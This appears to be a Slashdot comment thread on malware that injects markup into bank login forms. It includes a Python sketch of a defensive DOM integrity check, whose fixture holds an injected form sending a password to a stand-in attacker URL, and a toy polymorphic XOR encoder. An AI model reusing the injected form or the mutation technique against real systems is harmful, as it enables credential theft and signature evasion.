  • by CSMatt (1175471)

    Will someone please make a BugMeNot account for this site? I'm not registering just to view one PDF file.

  • by psydeshow (154300) on Saturday November 01, 2008 @01:52PM (#25596065) Homepage

    According to the Register article, the method of attack was DOM manipulation. The code waits until it sees a login form from a targeted site, and then it injects markup that sends the credentials to the bad guys on submit.

    We can speculate on whether that's true or not, but if it is then it should be fairly easy to use a bit more javascript (why not? heh.) to check the integrity of the DOM. Banks should also be randomizing the structure of their forms and the names/ids of form fields as a matter of course.

    Of course the attacks will evolve, but as long as you're going to play the game you've got to keep moving.
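A rough sketch of that integrity check, shown in Python for brevity; in the page it would be a few lines of JavaScript hashing the login form's outerHTML at load time and again in the submit handler. The form markup and the attacker URL here are made up:

```python
import hashlib

def digest(markup: str) -> str:
    """Fingerprint the form's serialized markup."""
    return hashlib.sha256(markup.encode()).hexdigest()

clean = '<form id="login" action="/login"><input name="pw"></form>'
injected = '<form id="login" action="https://evil.example/steal"><input name="pw"></form>'

baseline = digest(clean)              # taken when the page first renders
assert digest(clean) == baseline      # an untouched DOM passes the re-check
assert digest(injected) != baseline   # injected markup is caught before submit
```

As the comment says, this only raises the bar: malware that controls the browser can also tamper with the checking code itself.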

  • by Xenna (37238) on Saturday November 01, 2008 @02:32PM (#25596371)

    We used to call it polymorphic code. A much prettier name if you ask me.

    Been around since 1990:

    http://en.wikipedia.org/wiki/1260_(computer_virus) [wikipedia.org]

    • Re: (Score:2, Informative)

      by Bounb (1398651)
      Actually, polymorphic code is code that mutates as it spreads, whilst obfuscated code is code intentionally written to mask its function.
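The distinction is easy to show with a toy polymorphic "engine" in Python (the XOR encoding stands in for a real mutation engine):

```python
import os

def mutate(payload: bytes) -> bytes:
    """Emit a differently-encoded copy of the same payload each generation:
    a fresh random key, prepended so the constant stub below can decode it."""
    key = os.urandom(1)[0] | 1          # never zero, so the body really changes
    return bytes([key]) + bytes(b ^ key for b in payload)

def decode(blob: bytes) -> bytes:
    """The small, constant 'decryptor stub' every variant carries."""
    key, body = blob[0], blob[1:]
    return bytes(b ^ key for b in body)

payload = b"identical behaviour in every variant"
a, b = mutate(payload), mutate(payload)

# The encoded bodies almost always differ (different random keys), defeating
# simple byte signatures, yet each variant decodes to the very same payload.
assert decode(a) == payload and decode(b) == payload
```

Plain obfuscation, by contrast, is one fixed scrambled form written once by the author; polymorphism re-scrambles the code on every replication.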

